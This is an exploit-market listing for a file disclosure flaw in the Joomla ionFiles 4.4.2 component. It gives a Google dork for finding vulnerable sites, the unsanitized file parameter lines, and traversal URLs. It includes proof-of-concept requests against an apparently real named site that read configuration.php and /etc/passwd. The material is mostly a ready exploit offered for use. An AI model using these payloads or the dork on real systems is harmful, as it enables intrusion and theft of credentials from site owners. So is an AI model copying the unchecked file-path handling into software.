[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component ionFiles 4.4.2 File Disclosure Vulnerability

Author
Vrs-hCk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3933
Category
web applications
Date add
21-10-2008
Platform
unsorted
=============================================================
Joomla Component ionFiles 4.4.2 File Disclosure Vulnerability
=============================================================



[o]------------------------------------------------------------------------------------[x]
 |  Arbitrary File Download Vulnerability                                               |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ionFiles 4.4.2 Component for Joomla! CMS                                 |
 |  Vendor   : http://forum.codecall.net/                                               |
 |  Date     : 23 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    inurl:com_ionfiles

[»] Vulnerable

    ./download.php
	
	Line 32: $file = $_GET['file'];
    Line 33: $download = $_GET['download'];
    Line 66 - 91

[»] Exploit

    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1

[»] Proof of Concept

    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1

[o]------------------------------------------------------------------------------------[x]




#  0day.today [2024-10-05]  #